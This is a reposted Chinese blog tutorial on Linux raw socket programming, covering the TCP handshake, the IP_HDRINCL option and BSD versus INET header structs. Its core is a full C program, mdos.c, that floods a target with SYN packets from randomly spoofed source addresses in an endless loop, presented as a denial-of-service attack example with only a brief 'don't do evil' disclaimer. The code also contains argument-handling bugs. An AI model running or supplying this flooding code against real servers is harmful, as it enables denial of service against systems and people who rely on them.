2. 程式人生 > >Linux網路程式設計:原始套接字的魔力【上】

Linux網路程式設計:原始套接字的魔力【上】

阿新 發佈:2019-02-03

原文:http://blog.chinaunix.net/uid-23069658-id-3280895.html

基於原始套接字程式設計

       在開發面向連線的TCP和麵向無連線的UDP程式時,我們所關心的核心問題在於資料收發層面,資料的傳輸特性由TCP或UDP來保證:

       也就是說,對於TCP或UDP的程式開發,焦點在Data欄位,我們沒法直接對TCP或UDP頭部欄位進行赤裸裸的修改,當然還有IP頭。換句話說,我們對它們頭部操作的空間非常受限,只能使用它們已經開放給我們的諸如源、目的IP,源、目的埠等等。

       今天我們討論一下原始套接字的程式開發,用它作為入門協議棧的進階跳板太合適不過了。OK閒話不多說,進入正題。

       原始套接字的建立方法也不難:socket(AF_INETSOCK_RAWprotocol)。

       重點在protocol欄位,這裡就不能簡單的將其值為0了。在標頭檔案netinet/in.h中定義了系統中該欄位目前能取的值,注意:有些系統中不一定實現了netinet/in.h中的所有協議。原始碼的linux/in.h中和netinet/in.h中的內容一樣。

       我們常見的有IPPROTO_TCP,IPPROTO_UDP和IPPROTO_ICMP,在博文“(十六)洞悉linux下的Netfilter&iptables:開發自己的hook函式【實戰】(下)

”中我們見到該protocol欄位為IPPROTO_RAW時的情形,後面我們會詳細介紹。

       用這種方式我就可以得到原始的IP包了,然後就可以自定義IP所承載的具體協議型別,如TCP,UDP或ICMP,並手動對每種承載在IP協議之上的報文進行填充。接下來我們看個最著名的例子DOS攻擊的示例程式碼,以便大家更好的理解如何基於原始套接字手動去封裝我們所需要TCP報文。

       先簡單複習一下TCP報文的格式,因為我們本身不是講協議的設計思想,所以只會提及和我們接下來主題相關的欄位,如果想對TCP協議原理進行深入瞭解那麼《TCP/IP詳解卷1》無疑是最好的選擇。

       我們目前主要關注上面著色部分的欄位就OK了,接下來再看看TCP3次握手的過程。TCP的3次握手的一般流程是:

(1) 第一次握手:建立連線時,客戶端A傳送SYN包(SEQ_NUMBER=j)到伺服器B,並進入SYN_SEND狀態,等待伺服器B確認。

(2) 第二次握手:伺服器B收到SYN包,必須確認客戶A的SYN(ACK_NUMBER=j+1),同時自己也傳送一個SYN包(SEQ_NUMBER=k),即SYN+ACK包,此時伺服器B進入SYN_RECV狀態。

(3) 第三次握手:客戶端A收到伺服器B的SYN+ACK包,向伺服器B傳送確認包ACK(ACK_NUMBER=k+1),此包傳送完畢,客戶端A和伺服器B進入ESTABLISHED狀態,完成三次握手。

 至此3次握手結束,TCP通路就建立起來了,然後客戶端與伺服器開始互動資料。上面描述過程中,SYN包表示TCP資料包的標誌位syn=1,同理,ACK表示TCP報文中標誌位ack=1,SYN+ACK表示標誌位syn=1和ack=1同時成立。

原始套接字還提供了一個非常有用的引數IP_HDRINCL:

1、當開啟該引數時:我們可以從IP報文首部第一個位元組開始依次構造整個IP報文的所有選項,但是IP報文頭部中的標識欄位(設定為0時)和IP首部校驗和欄位總是由核心自己維護的,不需要我們關心。

2、如果不開啟該引數:我們所構造的報文是從IP首部之後的第一個位元組開始,IP首部由核心自己維護,首部中的協議欄位被設定成呼叫socket()函式時我們所傳遞給它的第三個引數。

 開啟IP_HDRINCL特性的模板程式碼一般為:

       const int on =1;

  if (setsockopt (sockfd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0){

printf("setsockopt error!\n");

  }

      所以,我們還得複習一下IP報文的首部格式:

 同樣,我們重點關注IP首部中的著色部分割槽段的填充情況。

       有了上面的知識做鋪墊,接下來DOS示例程式碼的編寫就相當簡單了。我們來體驗一下手動構造原生態IP報文的樂趣吧:

點選(此處)摺疊或開啟

  1. //mdos.c
  2. #include <stdlib.h>
  3. #include <stdio.h>
  4. #include <errno.h>
  5. #include <string.h>
  6. #include <unistd.h>
  7. #include <netdb.h>
  8. #include <sys/socket.h>
  9. #include <sys/types.h>
  10. #include <netinet/in.h>
  11. #include <netinet/ip.h>
  12. #include <arpa/inet.h>
  13. #include <linux/tcp.h>
  14. //我們自己寫的攻擊函式
  15. void attack(int skfd,struct sockaddr_in *target,unsigned short srcport);
  16. //如果什麼都讓核心做,那豈不是忒不爽了,咱也試著計算一下校驗和。
  17. unsigned short check_sum(unsigned short *addr,int len);
  18. int main(int argc,char** argv){
  19.         int skfd;
  20.         struct sockaddr_in target;
  21.         struct hostent *host;
  22.         const int on=1;
  23.         unsigned short srcport;
  24.         if(argc!=2)
  25.         {
  26.                 printf("Usage:%s target dstport srcport\n",argv[0]);
  27.                 exit(1);
  28.         }
  29.         bzero(&target,sizeof(struct sockaddr_in));
  30.         target.sin_family=AF_INET;
  31.         target.sin_port=htons(atoi(argv[2]));
  32.         if(inet_aton(argv[1],&target.sin_addr)==0)
  33.         {
  34.                 host=gethostbyname(argv[1]);
  35.                 if(host==NULL)
  36.                 {
  37.                         printf("TargetName Error:%s\n",hstrerror(h_errno));
  38.                         exit(1);
  39.                 }
  40.                 target.sin_addr=*(struct in_addr *)(host->h_addr_list[0]);
  41.         }
  42.         //將協議欄位置為IPPROTO_TCP,來建立一個TCP的原始套接字
  43.         if(0>(skfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP))){
  44.                 perror("Create Error");
  45.                 exit(1);
  46.         }
  47.         //用模板程式碼來開啟IP_HDRINCL特性,我們完全自己手動構造IP報文
  48.          if(0>setsockopt(skfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on))){
  49.                 perror("IP_HDRINCL failed");
  50.                 exit(1);
  51.         }
  52.         //因為只有root使用者才可以play with raw socket :)
  53.         setuid(getpid());
  54.         srcport = atoi(argv[3]);
  55.         attack(skfd,&target,srcport);
  56. }
  57. //在該函式中構造整個IP報文,最後呼叫sendto函式將報文傳送出去
  58. void attack(int skfd,struct sockaddr_in *target,unsigned short srcport){
  59.         char buf[128]={0};
  60.         struct ip *ip;
  61.         struct tcphdr *tcp;
  62.         int ip_len;
  63.         //在我們TCP的報文中Data沒有欄位,所以整個IP報文的長度
  64.         ip_len = sizeof(struct ip)+sizeof(struct tcphdr);
  65.         //開始填充IP首部
  66.         ip=(struct ip*)buf;
  67.         ip->ip_v = IPVERSION;
  68.         ip->ip_hl = sizeof(struct ip)>>2;
  69.         ip->ip_tos = 0;
  70.         ip->ip_len = htons(ip_len);
  71.         ip->ip_id=0;
  72.         ip->ip_off=0;
  73.         ip->ip_ttl=MAXTTL;
  74.         ip->ip_p=IPPROTO_TCP;
  75.         ip->ip_sum=0;
  76.         ip->ip_dst=target->sin_addr;
  77.         //開始填充TCP首部
  78.         tcp = (struct tcphdr*)(buf+sizeof(struct ip));
  79.         tcp->source = htons(srcport);
  80.         tcp->dest = target->sin_port;
  81.         tcp->seq = random();
  82.         tcp->doff = 5;
  83.         tcp->syn = 1;
  84.         tcp->check = 0;
  85.         while(1){
  86.                 //源地址偽造,我們隨便任意生成個地址,讓伺服器一直等待下去
  87.                 ip->ip_src.s_addr = random();
  88.                 tcp->check=check_sum((unsigned short*)tcp,sizeof(struct tcphdr));
  89.                 sendto(skfd,buf,ip_len,0,(struct sockaddr*)target,sizeof(struct sockaddr_in));
  90.         }
  91. }
  92. //關於CRC校驗和的計算,網上一大堆,我就“拿來主義”了
  93. unsigned short check_sum(unsigned short *addr,int len){
  94.         register int nleft=len;
  95.         register int sum=0;
  96.         register short *w=addr;
  97.         short answer=0;
  98.         while(nleft>1)
  99.         {
  100.                 sum+=*w++;
  101.                 nleft-=2;
  102.         }
  103.         if(nleft==1)
  104.         {
  105.                 *(unsigned char *)(&answer)=*(unsigned char *)w;
  106.                 sum+=answer;
  107.         }
  108.         sum=(sum>>16)+(sum&0xffff);
  109.         sum+=(sum>>16);
  110.         answer=~sum;
  111.         return(answer);
  112. }
       用前面我們自己編寫TCP伺服器端程式來做本地測試,看看效果。先把伺服器端程式啟動起來,如下:

       然後,我們編寫的“搗蛋”程式登場了:

       該“mdos”命令執行一段時間後,伺服器端的輸出如下:

       因為我們的源IP地址是隨機生成的,源埠固定為8888,伺服器端收到我們的SYN報文後,會為其分配一條連線資源,並將該連線的狀態置為SYN_RECV,然後給客戶端回送一個確認,並要求客戶端再次確認,可我們卻不再bird別個了,這樣就會造成服務端一直等待直到超時。

       備註:本程式僅供交流分享使用,不要做惡,不然後果自負哦。

       最後補充一點,看到很多新手經常對struct ip{}和struct iphdr{},struct icmp{}和struct icmphdr{}糾結來糾結去了,不知道何時該用哪個。在/usr/include/netinet目錄這些結構所屬標頭檔案的定義,標頭檔案中對這些結構也做了很明確的說明,這裡我們簡單總結一下:

       struct ip{}、struct icmp{}是供BSD系統層使用,struct iphdr{}和struct icmphdr{}是在INET層呼叫。同理tcphdr和udphdr分別都已經和諧統一了,參見tcp.h和udp.h。

       BSD和INET的解釋在協議棧篇章詳細論述,這裡大家可以簡單這樣來理解:我們在使用者空間的編寫網路應用程式的層次就叫做BSD層。所以我們該用什麼樣的資料結構呢?良好的程式設計習慣當然是BSD層推薦我們使用的,struct ip{}、struct icmp{}。至於INET層的兩個同類型的結構體struct iphdr{}和struct icmphdr{}能用不?我只能說不建議。看個例子:

 我們可以看到無論BSD還是INET層的IP資料包結構體大小是相等的,ICMP報文的大小有差異。而我們知道ICMP報頭應該是8位元組,那麼BSD層為什麼是28位元組呢?留給大家思考。也就是說,我們這個mdos.c的例項程式中除了用struct ip{}之外還可以用INET層的struct iphdr{}結構。將如下程式碼:

點選(此處)摺疊或開啟

  1. struct ip *ip;

  3. ip=(struct ip*)buf;
  4. ip->ip_v = IPVERSION;
  5. ip->ip_hl = sizeof(struct ip)>>2;
  6. ip->ip_tos = 0;
  7. ip->ip_len = htons(ip_len);
  8. ip->ip_id=0;
  9. ip->ip_off=0;
  10. ip->ip_ttl=MAXTTL;
  11. ip->ip_p=IPPROTO_TCP;
  12. ip->ip_sum=0;
  13. ip->ip_dst=target->sin_addr;

  15. ip->ip_src.s_addr = random();
改成:

點選(此處)摺疊或開啟

  1. struct iphdr *ip;

  3. ip=(struct iphdr*)buf;
  4. ip->version = IPVERSION;
  5. ip->ihl = sizeof(struct ip)>>2;
  6. ip->tos = 0;
  7. ip->tot_len = htons(ip_len);
  8. ip->id=0;
  9. ip->frag_off=0;
  10. ip->ttl=MAXTTL;
  11. ip->protocol=IPPROTO_TCP;
  12. ip->check=0;
  13. ip->daddr=target->sin_addr.s_addr;

  15. ip->saddr = random();

       結果請童鞋們自己驗證。雖然結果一樣,但在BSD層直接使用INET層的資料結構還是不被推薦的。

       小結:

       1、IP_HDRINCL選項可以使我們控制到底是要從IP頭部第一個位元組開始構造我們的原始報文或者從IP頭部之後第一個資料位元組開始。

       2、只有超級使用者才能建立原始套接字。

       3、原始套接字上也可以呼叫connet、bind之類的函式,但都不常見。原因請大家回顧一下這兩個函式的作用。想不起來的童鞋回頭複習一下前兩篇的內容吧。

相關推薦

Linux網路程式設計原始魔力

原文:http://blog.chinaunix.net/uid-23069658-id-3280895.html 基於原始套接字程式設計        在開發面向連線的TCP和麵向無連線的UDP程式時,我們所關心的核心問題在於資料收發層面,資料的傳輸特性由TCP或UDP來

Linux網路程式設計原始-ping協議實現

1.概述 PING協議是用來檢驗本地主機與遠端主機是否連線,傳送的是ICMP ECHO_REQUEST包。普通的套接字是基於TCP或者是UDP的,無法傳送ICMP包,所以必須用原始套接字來實現。PING協議的客戶端型別值為8,程式碼值為0,表示請求。而PING協議的響應端型別值為0,程式碼值也為

Linux 網路程式設計原始

1. 介紹 前面主要介紹了流式套接字(SOCK_STREAM),資料報套接字(SOCK_DGRAM),基本上能夠滿足TCP與UDP的應用。但一些問題,我們仍然無法解決,如: (1)傳送一個自定義的IP包 (2)傳送ICMP包 (3)偵聽網路上的資料包 (4)偽裝IP地址 (5

Windows網路程式設計(七)原始開發

在呼叫socket()函式時,如果將第二個引數填為SOCK_RAW,代表建立的是原始套接字型別,第三個引數可以選擇IPPROTO_ICMP、IPPROTO_TCP、IPPROTO和IPPROTO_RAW。 #include <winsock2.h> #pragma co

UNIX網路程式設計——基本TCP程式設計 轉貼

一、基於TCP協議的網路程式 下圖是基於TCP協議的客戶端/伺服器程式的一般流程:                             &

Linux網路協議棧(二)——快取(socket buffer)

Linux網路核心資料結構是套接字快取(socket buffer),簡稱skb。它代表一個要傳送或處理的報文,並貫穿於整個協議棧。 1、    套接字快取 skb由兩部分組成: (1)    報文資料:它儲存了實際在網路中傳輸的資料; (2)    管理資料:供核心處理報

linux下簡單的原始通訊

原始套接字程式設計分析 與普通socket套接字程式設計,區別在於,原始套接字可以自行組裝資料包(偽裝本地 IP,本地 MAC),可以接收本機網絡卡上所有的資料幀(資料包)。另外,必須在管理員許可權下才能使用原始套接字。 通常情況下所接觸到的套接字(Sock

Linux網路程式設計——原始例項MAC 頭部報文分析

通過《Linux網路程式設計——原始套接字程式設計》得知,我們可以通過原始套接字以及 recvfrom( ) 可以獲取鏈路層的資料包,那我們接收的鏈路層資料包到底長什麼樣的呢? MAC 頭部(有線區域網) 注意:CRC、PAD 在組包時可以忽略 鏈路層資料包的其中一

Linux 網路程式設計——原始例項MAC 地址掃描器

如果 A (192.168.1.1 )向 B (192.168.1.2 )傳送一個數據包,那麼需要的條件有 ip、port、使用的協議(TCP/UDP)之外還需要 MAC 地址,因為在乙太網資料包中 MAC 地址是必須要有的。那麼怎樣才能知道對方的 MAC 地址?答案是:它通

Linux 網路程式設計——原始例項傳送 UDP 資料包

乙太網(Ethernet)報文格式(MAC頭部報文格式): IP 報文格式: UDP 報文格式: 校驗和函式: /******************************************************* 功能:     

Linux網路程式設計——原始程式設計

原始套接字的建立 int socket ( int family, int type, int protocol ); 引數: family:協議族 這裡寫 PF_PACKET type:  套接字類,這裡寫 SOCK_RAW protocol:協議類別,指定可以接收或傳送的資料包型別,不能寫

網路程式設計——原始實現原理

目錄 1. 基礎知識  1.1、概述 1.2、鏈路層原始套接字  1.3、網路層原始套接字 2、原始套接字的實現 2.1  原始套接字報文收發流程 2.2鏈路層原始套接字的實現     2.2.1  套接字建

Linux下的raw Socket(原始程式設計

前言 簡介 最近專案需要用到rawSocket來進行自定義IP報文的源地址。 windows從winxp sp2開始便對raw socket進行了限制。 【1】只能傳送UDP包 【2】只能傳送正確的UDP包 【3】不能冒充源地址,即,源地址只能填本機地址。

linux sock_raw原始程式設計 (轉)和Linux下Libpcap原始碼分析和包過濾機制

sock_raw原始套接字程式設計可以接收到本機網絡卡上的資料幀或者資料包,對與監聽網路的流量和分析是很有作用的.一共可以有3種方式建立這種 socket 1.socket(AF_INET, SOCK_RAW, IPPROTO_TCP|IPPROTO_UDP|IPPROT

TCP/IP網路程式設計09的多種可選項

本篇文章主要介紹了套接字的幾個常用配置選項,包括SO_SNDBUF & SO_RCVBUF、SO_REUSEADDR及TCP_NODELAY等。 套接字可選項和I/O緩衝大小 前文關於套接字的描述僅僅是使用其預設套接字特性來進行資料通訊,這對於簡單的使用場景來說似乎是可以的,然而實際工作場景中的確需要

第二部分基本程式設計

IPv4網際套接字地址結構: struct in_addr{ in_addr_t s_addr; }; struct sockaddr_in{ uint8_t sin_len; sa_family_t sin_family; in_port_t sin_port; struct in_a

《網際網路程式設計(Java)》——課程筆記7UDP程式設計(無連線)

學會使用UDP套接字來實現網路應用程式設計。 UDP通訊特點:     (1) UDP有別於TCP,有自己獨立的套接字(IP+PORT),它們的埠號不衝突;     (2) UDP 通訊前通常[不]需要連線;     (3) 基於使用者資料報文(包)讀寫;    

一種攔截Linux原始IO的方法

描述    原始套接字具有廣泛的用途,特別是用於自定義協議(標準協議TCP、UDP和ICMP等外)的資料收發。在Linux下攔截套接字IO的一般方法是攔截對應的套接字系統呼叫,對於傳送為sendmsg和sendto,對於接收為recvmsg和recvfrom。這種方法雖然也能攔截原始套接字IO,

Linux原始之sniffer部分實現

1.概述  通常在同一個網段的所有網路介面都有訪問在物理媒體上傳輸的所有資料的能力,而每個網路介面都還應該有一個硬體地址,該硬體地址不同於網路中存在的其他網路介面的硬體地址,同時,每個網路至少還要一個廣播地址。(代表所有的介面地址),在正常情況下,一個合法的網路介面應該只響應這樣的兩種資料幀:&

Linux原始之ARP協議實現

1. ARP協議介紹  ARP(AddressResolutionProtocol)地址解析協議用於將計算機的網路地址(IP地址32位)轉化為實體地址(MAC地址48位)[RFC826].ARP協議是屬於鏈路層的協議,在乙太網中的資料幀從一個主機到達網內的另一臺主機是根據48位的乙太網地址(硬體